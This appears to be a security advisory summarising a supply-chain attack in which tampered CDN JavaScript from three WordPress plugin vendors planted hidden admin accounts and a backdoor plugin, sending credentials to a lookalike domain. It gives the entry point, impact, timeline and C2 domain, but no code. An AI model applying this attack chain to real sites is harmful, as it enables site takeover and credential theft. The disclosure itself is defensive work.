What Happened
A supply chain attack against three popular WordPress marketing plugins — OptinMonster, TrustPulse, and PushEngage — served tampered JavaScript from their vendors’ CDNs to live websites. The injected code ran inside the browser of any logged-in administrator who loaded an affected page, and used that administrator’s own session to silently create hidden admin accounts and install a self-hiding backdoor plugin.
The Entry Point
Per OptinMonster’s disclosure, an attacker exploited a vulnerability in a third-party plugin (UpdraftPlus) running on OptinMonster’s marketing website to gain access to that server. From there they retrieved a CDN API key and used it to modify the JavaScript files served to customers from the CDN edge. No update was pushed to the plugins themselves — the change happened entirely at the CDN.
Scale of Impact
The campaign hit over 1.2 million sites. OptinMonster alone has over a million active WordPress installations, with TrustPulse and PushEngage adding many more. The payload only fires for logged-in admins — but as the threat actor effectively gains full control of individual sites, further abuse of regular visitors is to be expected.
Attack Mechanics
The malware waits for a logged-in administrator, creates a backdoor admin account, and installs a self-hiding backdoor plugin. It then sends the new credentials to tidio.cc — a lookalike of the real tidio.com
The C2 domain tidio.cc was registered on April 28, 2026, and issued a TLS certificate — indicating the campaign was prepared well in advance. Malware was first observed in OptinMonster and TrustPulse api.min.js files on June 12 at 22:17 UTC.
Timeline of Containment
OptinMonster and TrustPulse files were clean by June 13, while PushEngage’s script lingered on some CDN servers into June 14.
Broader Risk — Awesome Motive Portfolio
Awesome Motive runs one of the largest WordPress plugin portfolios in the world — WPForms (6M+ installs), MonsterInsights (~2M), All in One SEO (~3M). So far only OptinMonster, TrustPulse, and PushEngage code has been confirmed compromised — but anyone running any Awesome Motive plugin should stay alert.
